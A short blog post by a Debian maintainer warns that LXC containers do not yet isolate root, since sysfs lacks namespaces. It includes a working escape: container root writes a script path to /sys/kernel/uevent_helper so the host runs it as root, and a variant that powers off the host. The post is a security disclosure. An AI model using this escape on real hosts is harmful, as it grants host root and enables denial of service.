Md at

tales of a debian maintainer

Evading from linux containers

For the past few years, the Linux Containers project has been developing some kernel technologies which provide isolation, accounting and management for kernel resources. When completed, together they will allow implementing lightweight virtualization of the operating system like is currently possible with OpenVZ.

It is very important to understand that not all the pieces are ready yet, so currently a LXC container does not provide the same security of other virtualization technologies.

This example shows how the root user of a container can easily run code as root in the host system, since sysfs does not support namespaces:

lxc$ cat <<END > /tmp/evil-helper
echo 'hi!' >> /tmp/evil-helper.log
lxc$ chmod +x /tmp/evil-helper

lxc# mkdir /sys
lxc# mount -t sysfs sysfs /sys
lxc# echo /var/lib/lxc/test/rootfs/tmp/evil-helper > /sys/kernel/uevent_helper
lxc# echo change > /sys/class/mem/null/uevent

The last command will trigger a uevent, which will be processed by running in the host our script created inside the container.

Or else:

lxc# echo /sbin/poweroff > /sys/kernel/uevent_helper

Because of this, LXC containers are vulnerable to a malicious root user and are not really a replacement for OpenVZ. This will change when support for labelling files with user namespaces will be completed.


This is the blog of Marco d'Itri.

2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31          

See also:

My blogroll:

W3C HTML 4.01
W3C CSS 2.0     

Powered by